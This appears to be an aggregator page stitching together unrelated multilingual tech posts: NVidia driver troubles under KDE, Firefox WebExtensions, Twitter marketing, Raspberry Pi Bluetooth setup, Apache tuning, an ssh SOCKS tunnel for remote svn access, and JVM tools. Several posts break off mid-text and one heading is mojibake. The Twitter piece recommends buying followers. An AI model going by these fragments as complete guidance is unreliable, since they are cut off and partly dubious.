'Open source is now mainstream..' (no replies)        
'Open source is now mainstream. More and more developers, organizations, and enterprises are are understanding the benefits of an open source strategy and getting involved. In fact, The Linux Foundation is on track to reach 1,000 participating organizations in 2017 and aims to bring even more voices into open source technology projects ranging from embedded and automotive to blockchain and cloud.'

- Mike Woster, Global Enterprises Join The Linux Foundation to Accelerate Open Source Development Across Diverse Industries, March 30, 2017


(Open Source) - '..“open innovation.” Companies such as AstraZeneca, Lilly, GSK, Janssen, Merck, Pfizer, Sanofi, TransCelerate, and others..'

'..Microsoft, is shifting over to open source for its development.'

          VMWARE FUSIONを買ってその上でXPを動かせば?        






          KDE and NVidia (updated)        

KDE Project:

The above combination was never a painless experience, still at some point in past it seemed to be better to have a NVidia card on Linux then anything else, so I continued to buy them whenever my system was upgraded. Lately although it started to make me rather bad. I have two computers, one that is a 4 core Intel CPU with 8GB of memory, the other is a Core2Duo with 3GB. The latter is a Lenovo laptop. Both have NVidia, nothing high end (Qudaro NVS something and 9300GE, both used with dual monitor setup), but they should be more than enough for desktop usage. Are they?
Well, something goes wrong there. Is that KDE, is that XOrg, is that the driver? I suspect the latter. From time to time (read: often), I ended up with 100% CPU usage for XOrg. Even though I had 3 cores doing nothing the desktop was unusable. Slow scroll, scroll mouse movements, things typed appearing with a delay, things like that. Like I'd have an XT. I tried several driver version, as I didn't always have this issues, but with newer kernel you cannot go back to (too) old drivers. I googled, and found others having similar experience, with no real solution. A suspicion is font rendering for some (non-aliased) fonts, eg. Monospace. Switching fonts sometimes seemed to make a difference, but in the end, the bug returned. Others said GTK apps under Qt cause the problem, and indeed closing Firefox sometimes helped. But it wasn't a solution. Or there was a suggestion to turn the "UseEvents" option on. This really seemed to help, but broke suspend to disk. :( Turning off the second display and turning on again seemed to help...for a while. Turning off the composite manager did not change the situation.
Finally I tried the latest driver that appeared not so long ago, 256.44. And although the CPU usage of XOrg is still visible, with pikes going up to 20-40%, I gain back the control over the desktop. Am I happy with it? Well, not....
As this was only my desktop computer. I quickly updated the driver on the laptop as well, and went on the road. Just to see 100% CPU usage there. :( Did all the tricks again, but nothing helped. Until I had the crazy idea to change my widget theme from the default Oxygen to Plastique. And hurray, the problem went away! It is not perfect, with dual monitor enabled sometimes maximizing a konsole window takes seconds, but still in general the desktop is now usable. And of course this should also make me have more uptime on battery.
Do I blame Oxygen? No, not directly. Although might make sense to investigate what causes there the NVidia driver going crazy and report to NVidia.

So in case you have similar problems, try to switch to 256.44 and if it doesn't help chose a different widget style.

Now, don't say me to use nouveau or nv. Nouveau gave me graphic artifacts and it (or KDE?) didn't remember the dual card setup. Nv failed the suspend to disk test with my machine and doesn't provide 3D acceleration needed eg. for Google Earth.

UPDATE: I upgraded my laptop to 4.5.1 (from openSUSE packages).Well, this broke composition completely, I got only black windows. I saw a new driver is available (256.53), let's try it. So far, so good, even with Oxygen. Let's see on the long run how it behaves, I didn't test it in deep.

          Senior Linux Administrator - Zurka Interactive        
Washington, DC - We're looking for an outstanding Sr. Linux Admin to join a top-notch group supporting world class science and technology at the U.S. Naval Research Laboratory (NRL). Zurka Interactive is expanding our team at NRL in Washington DC.
          Linux Administrator - Retail Solutions, Inc.        
Providence, RI - Technical Operations - Providence, RI - Full Time

The Linux Administrator position is a contributing member of the RSi Technical Operations team. This team strives to provide a consistent level of world-class, utility grade support for its internal and external
          Backing up and restoring data on Android devices directly via USB (Howto)        
Motivation I was looking for a simple way to backup data on Android devices directly to a device running GNU/Linux connected over a USB cable (in my case, a desktop computer). Is this really so unique that it’s worth writing a new article about it? Well, in my case, I did not want to buffer Read more »
          ÎŒÎ»Î± όσα αλλάζουν στον Firefox        

Είναι αδιαμφισβήτητο το γεγονός ότι ο άλλοτε κραταιός browser βρίσκεται πια σε δεύτερη, ίσως και τρίτη, μοίρα στη γνωστή «μάχη». Δε θα σταθούμε ιδιαίτερα στα πώς και τα γιατί, εντούτοις θα αναγνωρίσουμε ότι η αλεπού υστερεί έναντι του ανταγωνισμού. Ενίοτε και δραματικά.
Εδώ και κάμποσα χρόνια, ο Firefox, η εφαρμογή που κάποτε όριζε τις εξελίξεις στην πλοήγηση του διαδικτύου, έχει καταλήξει να τις κυνηγά ασθμαίνοντας, ενώ γίνεται όλο και πιο ορατός ο κίνδυνος να βρεθεί στην αφάνεια.
Φυσικά, αυτό δεν πέρασε απαρατήρητο από τη μαμά Mozilla, η οποία έλαβε την -τολμηρή, είναι η αλήθεια- απόφαση να τον διαλύσει σχεδόν στα εξ ων συνετέθη και να τον δημιουργήσει ξανά. Όσο κι αν φαίνεται περίεργο, είναι ίσως η πρώτη φορά έπειτα από πολύ καιρό που υπάρχει ολοκληρωμένο πλάνο για τη δημιουργία ενός σύγχρονου browser, με κάθε επιλογή να είναι απόλυτα αιτιολογημένη από τεχνικής πλευράς. Ταυτόχρονα, οι προγραμματιστές φροντίζουν με κάθε δυνατό τρόπο ώστε οι αλλαγές να επέλθουν ομαλά και να μη βρεθούν ξαφνικά οι χρήστες μπροστά σε κάτι εντελώς άγνωστο.
Στην πραγματικότητα, η νέα εποχή για τον Firefox σηματοδοτήθηκε από την επιτάχυνση του κύκλου εκδόσεων και την υιοθέτηση του αποκαλούμενου «Rapid Release», σύμφωνα με το οποίο προκύπτει μία νέα σταθερή έκδοση κάθε πέντε με οκτώ εβδομάδες περίπου. Τώρα ο κύκλος αυτός θα επιταχυνθεί ακόμα περισσότερο, με την αφαίρεση ενός βήματος. Η πορεία των εκδόσεων ήταν κατά σειρά Nightly -> Aurora (από εδώ προέκυπτε η Developer Edition) -> Beta -> Stable και στο εξής δε θα βγαίνει η Aurora, με την Developer να πηγάζει από την εκάστοτε Beta.
Ακολουθώντας την ίδια λογική ως προς την αύξηση της ταχύτητας ανάπτυξης, δεν προκάλεσε ακριβώς έκπληξη η επιλογή να απαλλαγεί ο browser από το μικρότερο ξαδερφάκι του, το Thunderbird, με το δεύτερο να (εξ)αναγκάζεται να ενηλικιωθεί σχετικά απότομα και να ορίσει τη δική του μοίρα. Αν θέλετε περισσότερες πληροφορίες για αυτό, πεταχτείτε στα γρήγορα προς το τέλος του άρθρου.
Στη συνέχεια θα δούμε πώς ακριβώς θα μεταμορφωθεί ο Firefox και θα προσπαθήσουμε να εξηγήσουμε τους λόγους που οδήγησαν στις συγκεκριμένες αλλαγές. Στόχος δεν είναι να πειστεί κανείς για το αξιόλογο της συγκεκριμένης εφαρμογής αλλά απλά και μόνο η επαρκής πληροφόρηση. Να σημειώσουμε εδώ ότι δε θα αναφερθούμε εκτενώς σε όλες τις μεταβολές, γιατί αρκετές από αυτές είναι σε πρώιμο στάδιο ακόμα. Θα παραμείνουμε περισσότερο σε αυτές που είναι ήδη εδώ αλλά και σε εκείνες που θα υλοποιηθούν στο άμεσο μέλλον.

Ξεκινάμε με κάτι που, πριν καν ολοκληρωθεί, έχει συγκεντρώσει μεγάλο αριθμό αντιδράσεων, οι οποίες αναμένεται να ενταθούν όσο πλησιάζει η στιγμή της εφαρμογής του. Πρόκειται για το φαινόμενο «τα πρόσθετά μας πέθαναν, τα πρόσθετά μας πάνε». Δηλαδή, δεν πάνε ακριβώς. Και οι αντιδράσεις, αν και κατανοητές, είναι υπερβολικές μερικές φορές, ειδικά αν αναλογιστεί κανείς την ανάγκη πίσω από αυτή την απόφαση.
Τι θα συμβεί; Ένας αρκετά μεγάλος αριθμός πρόσθετων (add-ons) θα πάψει να λειτουργεί. Απλά και ξεκάθαρα. Όπως είπαμε, o Firefox αλλάζει και μία από τις σημαντικότερες αλλαγές είναι η εμφάνιση ενός νέου τύπου πρόσθετων, των WebExtensions. Αναπόφευκτα, μια τέτοια αλλαγή σημαίνει ότι ορισμένοι χρήστες θα αναγκαστούν να αναζητήσουν εναλλακτικές λύσεις για τα πρόσθετα εκείνα που δε θα δουλεύουν πια ή σε ορισμένες περιπτώσεις να συμβιβαστούν με την έλλειψη αυτών.
Γιατί όμως αποφασίστηκε κάτι τέτοιο; Είναι τρελοί οι προγραμματιστές και δεν τους ενδιαφέρουν οι χρήστες; Μήπως απλά δεν ξέρουν τι κάνουν; Εννοείται βέβαια πως δεν ισχύει κάτι από αυτά. Αυτό που ισχύει, χωρίς να αναλωθούμε σε υπερβολικά τεχνικές αναλύσεις, είναι ότι ο Firefox στα σωθικά του είναι γερασμένος. Η γλώσσα που χρησιμοποιεί, η XUL, είναι σχετικά παρωχημένη, είναι δεμένη με την επίσης γερασμένη και προγραμματισμένη για αντικατάσταση μηχανή Gecko, ενώ δε χρησιμοποιείται ιδιαίτερα σε περιβάλλοντα εκτός της Mozilla. Αντί λοιπόν να παραμείνουν δέσμιοι στη συντήρηση της γλώσσας αυτής, επέλεξαν να την αλλάξουν σταδιακά. Το πρόβλημα όμως είναι ότι τα πρόσθετα χρησιμοποιούν επίσης τη XUL.
Ας δούμε όμως λίγες περισσότερες λεπτομέρειες, ώστε να καταλάβουμε καλύτερα το όλο θέμα. Να πούμε πρώτα τα αρνητικά, τι θα χάσουν δηλαδή οι χρήστες: θα χάσουν προφανώς κάποια από τα πρόσθετα που έχουν συνηθίσει να χρησιμοποιούν. Αυτό βέβαια δεν είναι απαραίτητο να συμβεί σε όλους. Αρκετά από τα ήδη υπάρχοντα πρόσθετα έχουν είτε ολοκληρώσει, είτε ξεκινήσει τη μετατροπή σε WebExtensions. Θα χάσουν επίσης -ανάλογα με την περίπτωση πάντα- λίγη ή περισσότερη λειτουργικότητα από τα πρόσθετά τους, ακόμα κι αν αυτά υπάρχουν στη νέα εκδοχή τους. Αυτό το τελευταίο φαίνεται ιδιαίτερα άσχημο, είναι όμως αναγκαίο αντάλλαγμα για κάτι που θα κερδηθεί.
Πάμε τώρα σε αυτά που θα μας προσφέρουν τα WebExtensions. Το πρώτο είναι η διαλειτουργικότητα. Θα χρησιμοποιούν APIs συμβατά με αυτά του Chrome (και των browsers που βασίζονται στη μηχανή Blink), κάτι που σημαίνει ότι αφενός μεν τα διαθέσιμα για άλλους browsers πρόσθετα θα μπορούν να τρέξουν -με κάποιες μικρές αλλαγές- και στον Firefox, αφετέρου δε κάποιος που θέλει να δημιουργήσει ένα πρόσθετο, δε θα βρεθεί στο δίλημμα επιλογής browser και θα καταλήξει στον Chrome ως πρωτοπόρο σε αριθμό χρηστών αλλά θα μπορεί κατ’ ουσίαν να φτιάξει ένα για όλους.
Το δεύτερο σημαντικό στοιχείο που προσμετράται στα θετικά (έχοντας όμως το «αρνητικό» ότι αποτελεί το αντάλλαγμα που προαναφέραμε) είναι ότι με τη χρήση των WebExtensions ενισχύεται σημαντικά η ασφάλεια στο περιβάλλον του browser και η ευελιξία στην ανάπτυξή του. Αρκετά σοβαρός λόγος για να γίνει η αλλαγή, δε βρίσκετε; Για να συμβούν αυτά όμως, θα περιοριστούν όσα μπορεί να κάνει ένα πρόσθετο. Με το τωρινό σύστημα και μέσω της XUL, κάθε πρόσθετο έχει εν δυνάμει απεριόριστη πρόσβαση στον browser. Αυτό του δίνει πολλές δυνατότητες, τόσες ώστε να μπορεί να αλλάξει την εμφάνιση της ίδιας της εφαρμογής αλλά και τη λειτουργία της. Είναι ωραίο, μας αρέσει και το χαίρονται ιδιαίτερα οι «power users», δεν αντιλέγει κανένας. Εγκυμονεί κινδύνους όμως. Έχοντας πρόσβαση στα ενδότερα, ένα κακόβουλο ή απλά κακογραμμένο πρόσθετο -και υπάρχουν δεκάδες τέτοια- μπορεί από το να αυξήσει σημαντικά την κατανάλωση πόρων του συστήματος (βλέπε AdBlock) μέχρι και να οδηγήσει στη δημιουργία κενών στη διαδικτυακή μας ασφάλεια. Επίσης, δεν είναι δυνατό το πέρασμα σε νεότερη έκδοση του Firefox χωρίς να «σπάσουν» κάποια πρόσθετα.
Αυτά θα επιχειρηθεί να αντιμετωπιστούν με τη μετάβαση στα WebExtensions. Τα νέα πρόσθετα θα έχουν λιγότερες δυνατότητες, θα είναι όμως πιο εύκολο για τους προγραμματιστές να γράψουν σωστό κώδικα, άρα και να έχουμε μελλοντικά πρόσθετα καλύτερης ποιότητας. Θα είναι επίσης αρκετά πιο ασφαλή, ενώ δε θα μπορούν να «γονατίσουν» τον browser, όπως συμβαίνει μέχρι τώρα.

Στη βελτίωση της λειτουργίας της εφαρμογής θα συμβάλει μία ακόμα πολυπόθητη αλλαγή: το Electrolysis (e10s). Η αλεπού αποκτά επιτέλους τη δυνατότητα να τρέχει τις επιμέρους διεργασίες της με τρόπο που θα τις κάνει ανεξάρτητες μεταξύ τους, όπως συμβαίνει ήδη με το αντίπαλο δέος της Google.
Με το υπάρχον μοντέλο, ολόκληρη η λειτουργία του Firefox γίνεται μονοδιάστατα. Η διεπαφή χρήστη, η διαχείριση των καρτελών, τα πρόσθετα, η παρουσίαση του διαδικτυακού περιεχομένου, όλα βρίσκονται στον ίδιο νοητό χώρο και μπορούν να αλληλεπιδρούν. Αυτό παρουσιάζει σοβαρά μειονεκτήματα. Ένα-δύο ενδεικτικά, που θα τα έχετε συναντήσει σίγουρα αρκετοί από εσάς, είναι η καθυστέρηση στην απόκριση της διεπαφής (λ.χ. στο άνοιγμα του μενού) επειδή μια ιστοσελίδα είναι προβληματική ή η ενημέρωση ότι κάποιο script επηρεάζει αρνητικά τη λειτουργία της εφαρμογής. Στοιχεία που θα έπρεπε να είναι άσχετα μεταξύ τους, δεν είναι όμως. Πλέον θα πάψει να υφίσταται κάτι τέτοιο, γιατί τα επιμέρους συστατικά θα έχουν τη δική τους διεργασία (process). Όλο αυτό θα ενισχύσει την ταχύτητα και την αποκρισιμότητα του browser, θα αυξήσει όμως λίγο και την κατανάλωση πόρων.
Με μία σημαντική λεπτομέρεια εδώ: μαθαίνοντας ίσως από τα λάθη των άλλων, η multiprocess δραστηριότητα του Firefox δε θα λειτουργεί ακριβώς όπως στον Chrome. Δε θα δημιουργείται δηλαδή ένα process για κάθε νέα καρτέλα, οδηγώντας την κατανάλωση της RAM σε υπερβολικά επίπεδα. Αντίθετα, θα υπάρχει συγκεκριμένος αριθμός που θα αναλογεί στις καρτέλες, άλλος που θα αφορά τα πρόσθετα, τρίτος για τη γραφική διεπαφή κ.ο.κ. Τεχνικός συμβιβασμός δηλαδή που προσπαθεί να αποφέρει όσα περισσότερα πλεονεκτήματα μπορεί, προσφέροντας το ελάχιστο δυνατό αντίτιμο.
Το Electrolysis ενεργοποιήθηκε αρχικά εν είδει δοκιμής για περιορισμένο αριθμό χρηστών, ο οποίος αυξάνεται σταδιακά, ενώ από την έκδοση 54 θα είναι προενεργοποιημένο για τους χρήστες εκείνους που δε χρησιμοποιούν κανένα πρόσθετο. Γιατί μόνο για εκείνους; Ένα χαρακτηριστικό δείγμα του πόσο απαραίτητες είναι οι αλλαγές και η εγκατάλειψη του παλιότερου τρόπου λειτουργίας είναι το ότι το Electrolysis μπλοκάρεται (και απενεργοποιείται αυτόματα) αν εγκαταστήσουμε κάποιο πρόσθετο που δεν είναι συμβατό αυτό.
Τονίζουμε ότι το ορόσημο είναι η έκδοση 57, η οποία έχει προγραμματιστεί για τον ερχόμενο Νοέμβριο. Με την έλευσή της, θα είναι ενεργό για όλους το e10s, πιθανότατα με τέσσερα processes ως προεπιλογή, και παράλληλα κάθε μη WebExtension πρόσθετο θα αχρηστευθεί. Σε περίπτωση τώρα που κάποιος χρειαστεί λίγο περισσότερο χρόνο, θα μπορεί να περάσει στην αντίστοιχη ESR (Έκδοση Εκτεταμένης Υποστήριξης).
Για την εξυπηρέτηση των χρηστών υπάρχει ήδη διαθέσιμη σελίδα όπου καταχωρούνται τα συμβατά πρόσθετα. Υπάρχει επίσης σχετικό tag στη σελίδα με όλα τα πρόσθετα του Firefox ενώ στις επόμενες εκδόσεις και μέχρι την οριστική αποπομπή τους θα εμφανίζεται μέσα στον browser η ένδειξη «LEGACY» δίπλα σε όποιο πρόσθετο δεν είναι συμβατό και θα γίνεται παραπομπή σε αντίστοιχης λειτουργίας πρόσθετα.

Project Photon
Το Photon είναι ένα σχέ
          Sejda offre 30 strumenti online per fare di tutto con i PDF e un software per Windows, Mac e Linux        
Sejda è una suite che offre 30 strumenti online per fare di tutto con i PDF e un software per Windows, Mac e Linux. Le funzioni principali sono: split, merge, office & PDF, edit & sign, compress & convert. Vale a dire dividere, unire, ufficio e PDF, modificare e firmare, comprimere e convertire in altri formati. Vediamo […]
          How to use Twitter to promote your business online        

Twitter can be a very powerful tool for marketing any business or website online, and by using Twitter, a person can easily reach thousands, hundreds of thousands or even millions of potential customers consistently.

Tweeting Consistently
Once a person creates a profile for their business or for their website on Twitter, they should tweet consistently and update their profile consistently. Tweeting consistently will ensure that their Twitter followers are engaged in the information that they're posting, and usually, tweeting consistently can help a person to obtain new followers for their Twitter account.

Respond To Tweets
When a person has a Twitter account, people can send them tweets, or Twitter users can direct tweets to their Twitter profile. This is an excellent way for a business to connect with its customers and with its potential customers.

If a person has any questions for a business owner, they can easily ask the business owner those questions on Twitter. In addition, a question that is asked by one customer or one potential customer on Twitter is likely a question that many other people have, so when a business owner answers a question from one person, they are likely answering a question that many other people have as well.

Gaining More Followers

In order to reach a large amount of people on Twitter, it's vital to gain a large amount of followers. There are many ways to gain followers on Twitter, and one of the ways is to buy Twitter followers.

When a business owner buys Twitter followers, they should make sure that the Twitter followers that they bought are real and active. The more active that Twitter followers are, the more successful that the marketing strategy of a business on Twitter will be.

Following Other Twitter Users

In addition to gaining followers on Twitter, a business should follow other Twitter users. Following other Twitter users helps to promote interactivity among users on Twitter, and in addition, a business that follows many other people and many other profiles is likely to gain more followers much more quickly for its Twitter profile.

Posting Funny And Interesting Information

A business owner should frequently post funny and interesting information and content on Twitter. Posting funny, interesting and informative content will help to ensure that a person's Twitter followers stay interested and engaged, and in addition, posting funny and interesting content can increase the likelihood that the Twitter followers of a business profile will retweet the tweets of the business owner.

When Twitter users retweet content that a business has posted, that content can easily reach hundreds of thousands or even millions of other Twitter followers very quickly, and as a result, a business can very easily reach many more potential customers by having its followers retweet content that it has tweeted.

In addition, a business owner should also post deals and discounts for certain products and services sporadically by using their Twitter account. Posting deals and discounts will attract new customers to the business, and these deals and discounts make it likely that customers that have already placed orders with a business will place more orders in the near future. 

About Author: This article was written by Andy G, a tech geek and Linux fan from Austria. At the present moment he maintains firmware 
and driver download website called http://www.helpjet.net/

          How to Write and Compile C++ Code in Linux         


          Sorvete na testa do ano!!! Nokia fecha o NokiaBR...        
Hoje está correndo na blogosfera a celeuma sobre o fechamento do blog NokiaBR por imposição da Nokia. O José Antônio recebeu uma intimação de um escritório de advocacia sobre o uso indevido da marca "Nokia" (o que realmente eles têm razão) e entre outras ameaças e imposições, resultou no cancelamento imediato do domínio NokiaBR.
O mais estranho é que o blog NokiaBR era tocado por "um fã de carterinha" da marca e seu conteúdo era, em grande parte, positivo para a empresa finlandesa... Mas, como disse a Bia Kunze do Garota sem fio, em vez deles correrem atrás dos "Nokla", foram atrás do José Antônio.
O duro é que estes escritórios de advocacica parecem aqueles cachorrinhos pentelhos que ficam tentando latir o mais alto possível para se fazerem de ferozes e acabam espantando quem não deveriam...
Comigo há alguns anos tive uma experiência semelhante... Sou proprietário de uma pequena rede de varejo que comercializava uma marca de produtos que estava em litígio entre o importador antigo, de quem eu me abastecia, e o novo. Um belo dia apareceu uma "Notificação Extra-Judicial" de um escritório de advocacia representando o novo importador que entre outras ameaças, dizia que seria expedida uma ordem de apreensão de todo o meu estoque adquirido LEGALMENTE do importador antigo...
Na hora liguei para o representante de vendas do novo importador, já que eu era um dos maiores clientes do estado de outras marcas da empresa e me prontifiquei a me desfazer o mais rapidamente possível do estoque que havia adquirido do antigo importador daquela marca, vendendo abaixo do custo e não dando mais ênfase na vitrine.
E também solicitei que todos os representantes daquela empresa, a nova importadora que havia mandado a notificação, nunca mais aparecessem nas minhas lojas, pois não seriam atendidos. Ou seja, um advopgadozinho de m... espantou um dos maiores clientes da empresa...
Até hoje, passados mais de 5 anos, diretores e gerentes desta importadora em todas as feiras tentam de todo custo "abrir o ponto de venda" novamente...
Veja o relato do José Antônio no seu blog Zeletron.
Veja a repercussão na blogosfera...
Garota Sem Fio
Rodrigo Toledo
Picolé Parcelado
Fico com a sugestão do Rodrigo Tolego, vamos todos criar links para o blog "autorizado pela Nokia" do José Antônio, o Zeletron para que ele possa, em pouco tempo, ficar bem ranqueado nos Googles da vida...

Atualização: veja a resposta da Nokia sobre o assunto.
          FileZilla 3.0: enfin sorti mais…        
FileZilla était un client FTP dont seule une version Windows existait, désormais avec la sortie de la version 3.0, FileZilla est disponible sous Linux et *BSD. Un client FTP libre, performant, réputé pour être très paramétrable et offrant un large éventail d’options. Oui mais voilà, y a un mais. Le code source de FileZilla 3.0 a [...]
          Cost of business        
What people often overlook is that the costs of doing business in Europe is generally higher than in the US, due to a lot of little things. Localisation for smaller markets, for instance, complying with directives like RoHS, better warranty (in theory at least), better consumer protection for buying on-line, etc.Browser: Links (2.1pre23; Linux 2.4.33-tp600e i686; 127x43)
          RE[8]: embedded        
so an embedded linux system like the wrt54g wireless router is less secure than a linux system running on your $500 mac?
          RE[9]: embedded        
Can you do trafic control, QoS, proxy, content inspection, NID... with a wrt54g? Does it support SELinux, openwall, apparmor, rsbac, grsecurity, pax...? Has it been compiled with spp protection?
          [RPi] 树梅派安装Archlinux和蓝牙        
不久前入了个 Raspberry Pi 也就是大家说的树梅派(以下简称RPi),拿来做蓝牙测试,用的蓝牙dongle是ORICO的BTA-403-BL http://item.jd.com/980800.html ã€‚这里简单记录下安装过程:

首先是操作系统。作为Arch重度用户,当然选Archlinux ARM了: http://archlinuxarm.org/platforms/armv6/raspberry-pi ä¸‹è½½img文件,用dd写到SD卡上:
dd bs=1M if=/path/to/archlinux-hf-*.img of=/dev/sdX

然后用GParted把SD卡上的分区拖满,充分利用空间。这样SD卡就准备好了,插到RPi上,接上Micro-USB的电源和网线,启动RPi,从路由器上找到RPi的IP地址(机器名默认是alarmpi),ssh上去(用户名root密码root),修改密码,创建非root账号,执行系统更新 sudo pacman -Syu ,这之后开始安装蓝牙相关工具:
sudo pacman -S bluez bluez-utils

确保蓝牙dongle插到RPi的USB接口,通过 hciconfig 确认蓝牙设备被识别,输出应该类似下面这个样子:
[sean@alarmpi]$ hciconfig
hci0:   Type: BR/EDR  Bus: USB
        BD Address: 84:A6:C8:DC:04:97  ACL MTU: 310:10  SCO MTU: 64:8
        RX bytes:553 acl:0 sco:0 events:28 errors:0
        TX bytes:384 acl:0 sco:0 commands:27 errors:0

sudo systemctl start bluetooth

完成以后,即可通过 bluetoothctl 命令打开蓝牙控制台,执行各项蓝牙相关操作,比如show、list、scan on、agent、info等等,这里不展开了。

sudo pacman -S xorg xorg-xinit lxde
echo 'exec startlxde' > ~/.xinitrc


laogao 2014-01-01 13:11 发表评论

          [Tips] Windows环境下Apache最基本的调优方法        


Java EE应用,同时部署在两个Tomcat(5.5.27)实例上,前面放了个Apache(httpd-2.2.19-win32-x86-no_ssl),通过mod_jk(1.2.32)做负载均衡,同一台物理服务器,操作系统为64位的Windows Server 2003 SP2。现象是60+客户端,平均每个客户端每秒请求数2次,单个请求正常响应时间在500ms以内,即每秒冲进来120个请求,并发量最多在60上下,Apache就已不堪"重"负,静态资源响应时间都超过10s,同时Tomcat和数据库服务器均正常。凭我的经验,同样的压力直接压到Tomcat也不至于这么难看。看来问题出在Apache。


LoadModule status_module modules/mod_status.so
<Location /status>
  SetHandler server-status
  Order deny,allow
  Deny from all
  Allow from #需要的话也可放开为all


<IfModule mpm_winnt.c>
  ThreadsPerChild 300
  MaxRequestsPerChild 0

稍微解释一下:mpm_winnt.c是Apache为Windows NT提供的MPM (Multi-Processing Module),对应到Linux环境下,则有prefork.c(多进程/每进程1个线程)和worker.c(多进程+多线程)两种MPM可选。Windows下面只会有父与子两个进程,因此单个子进程能同时起多少线程(ThreadsPerChild)就成了调优的关键。另一个参数MaxRequestsPerChild的含义是单个子进程累计最多处理到少个请求,超过该值则退出重启,这是出于防止内存泄露慢慢拖垮整个服务器而做的防御性措施,0表示不做此限制。

新配置上线后,客户端数量顺利冲上200+。Case closed.

laogao 2011-08-02 21:04 发表评论

          ssh+tsocks - 远程办公利器        

设想一下这样的场景: 你出差在外,或者生病在家,有个紧急的需求要处理,涉及到数个源代码文件的改动,你亲自修改需要10分钟,电话和在公司的同伴沟通然后由他/她来修改则需要1小时。公司svn服务仅支持svn://协议,且仅限内网访问,而你只有一个ssh账号可以远程登录到公司某台Linux/UNIX服务器。

你暗自庆幸,幸好管理员有先见之明,为你留了个ssh口子,这样至少你还可以ssh上去通过命令行的方式在服务器上做svn checkout,vim ...和svn commit。不过如果你认为这就是全部,那就太小瞧ssh了。

ssh有个命令行参数 -D [地址:]端口,含义是在某个本地地址的某个端口上开SOCKS服务进行监听,把这个端口的数据通信以加密形式转发到ssh的另一端。你说好,我有了一个SOCKS服务器,但我又不是要上网走代理,svn也并不天然支持SOCKS啊,有什么用呢? 嗯,这正是tsocks的用武之地,它能透明的让普通应用程序也走SOCKS,安装方法很简单: 主流的Linux发行版,如Debian、Archlinux等的默认软件仓库已经自带了tsocks,通常只需要apt-get install或pacman -S即可,Mac OS X下则可以利用MacPorts安装,然后修改配置文件/etc/tsocks.conf(MacPorts会安装到/opt/local/etc目录),可以在样本文件tsocks.conf.sample的基础上修改,通常只要配置server =即可,其他都可以默认。

有了这些打底,剩下的就很简单了: 首先 ssh -D 1080 -f -N 用户名@公司服务器的公网地址 在本机的1080端口开启SOCKS服务;然后按照你平时使用svn的习惯,只是在命令前加上tsocks,类似这样: tsocks svn up 或者 tsocks svn ci -m 'blahblahblah' 等等即可,本地的svn sandbox不需要任何修改。

这个例子可以说只是冰山一角,不论是ssh还是tsocks都还有更高级的用法,而这个通道一旦打通,它的效果就像是简化版的VPN,除了ping之类的少数命令外,几乎就跟你在公司做各种操作没有两样,所以,发挥你的想象力吧 :)

laogao 2011-02-09 22:37 发表评论

          å¦‚何让统一版本的Eclipse RCP应用同时支持多个平台        

和Swing应用的直接跨平台不同,SWT/RCP应用要想同时支持不同平台,需要做些特殊的配置,不过并不复杂,记录在此,希望能帮到有需要的朋友。目前win32、32位Linux、64位Linux和Mac OS X基本上就覆盖了所有主流的桌面操作系统,本文将以同时支持这四种OS为例来进行讲解。








接下来将不同平台下的eclipse可执行文件(Windows下面是eclipe.exe,Linux下是eclipse,Mac OS X下面是Eclipse.app)放到不同的子目录下,当然,如果你的RCP应用有别的名称,也可以重命名eclipse可执行文件,按照不同平台的规范更换图标,然后修改.ini文件让它的-startup和-startup.libraray参数指向相对路径中正确版本的插件即可。

最后分享一下我们软件部署的机制: 按照前面介绍的方式打包的应用程序,交到用户手里并不是很友好,因为需要他/她自己再做一次判断,当前的操作系统是什么,然后打开不同的目录去点击不同的可执行文件。我们的做法是单独提供一个Swing程序,在客户端自动判断OS,然后自动调用不同版本的可执行文件,同时,这个Swing程序被做成Java Web Start,把整个RCP客户端的下载和同步也处理掉,这样,对用户而言,整个过程就透明了,只需要一个JNLP,剩下的工作完全自动化。

laogao 2011-01-30 12:17 发表评论


在Linux或其他UNIX和类UNIX环境下,ps命令想必大家都不陌生,我相信也有不少同学写过 ps aux | grep java | grep -v grep | awk '{print $2}' 这样的管道命令来找出Java进程的pid。常言道,Java并非真的"跨平台",它自己就是平台。作为平台,当然也有些基本的工具,让我们可以用更简单、更统一,同时又是非侵入的方式来查询进程相关信息。今天我们就来认识一下其中的两个。



jps [ options ] [ hostid ]

其中,options可以用 -q (安静) -m (输出传递给main方法的参数) -l (显示完整路径) -v (显示传递给JVM的命令行参数) -V (显示通过flag文件传递给JVM的参数) -J (和其他Java工具类似用于传递参数给命令本身要调用的java进程);hostid是主机id,默认localhost。



jstat -options 可以列出当前JVM版本支持的选项,常见的有 -class (类加载器) -compiler (JIT) -gc (GC堆状态) -gccapacity (各区大小) -gccause (最近一次GC统计和原因) -gcnew (新区统计) -gcnewcapacity (新区大小) -gcold (老区统计) -gcoldcapacity (老区大小) -gcpermcapacity (永久区大小) -gcutil (GC统计汇总) -printcompilation (HotSpot编译统计)

jstat -gcutil -t 12345 200 300 即可每200毫秒连续打印300次带有时间戳的GC统计信息。

简单解释一下: -gcutil是传入的option;必选,-t是打印时间戳,是以目标JVM启动时间为起点计算的,可选;12345是vmid/pid,和我们从jps拿到的是一样的,必选;200是监控时间间隔,可选,不提供就意味着单次输出;300是最大输出次数,可选,不提供且监控时间间隔有值的话,就是无限期打印下去。

具体输出明细的解释请参考官方文档 http://download.oracle.com/javase/6/docs/technotes/tools/share/jstat.html

laogao 2011-01-27 12:04 发表评论



1- 继续去年未完成的产品改造,换一种更稳妥的方式推进;
2- 积极参与社区交流活动,不论线上还是线下;
3- 深入学习Scala,辅以Clojure和Haskell;
4- 系统学习PostgreSQL;
5- 全面使用Emacs;
6- 开始读Linux源码;
7- 重读《红楼梦》;
8- 至少读两本英文原著;
9- 带儿子回一趟老家。


laogao 2011-01-02 20:08 发表评论

          Sony Ericsson Xperia X10: Has The Playing Field Changed Since it Was Announced in 2009?        


The hardware was great when it was first introduced, things I would suggest to make this phone truly great hardware-wise are:

  • AMOLED screen
  • At least 8GB internal memory
  • 512 MB Ram
  • HD Video (720P)
  • HDMI output

Those changes alone (even running Android 1.6) would see this phone sell like crazy. I'd go as far as saying just having 16GB of internal memory and micro-SD would make this the best phone to get.

Negatives Hardware

Last year when Sony announced this phone it was the best hardware you could get. Now HTC Bravo, HTC Supersonic, Nexus One, Motorola Motoroi changed this since they introduce 720p video recording, AMOLED screens, 512 MB RAM, HDMI output depending on the particular phone.


The Sony UX interface is great, but the OS holds back the hardware. It's like taking a Ferrari for a spin during rush hour! Android 1.6 really holds back the hardware and here's why:

  1. No HTML5 support

  2. Poor white/black ratio compared to Android 2.0/2.1

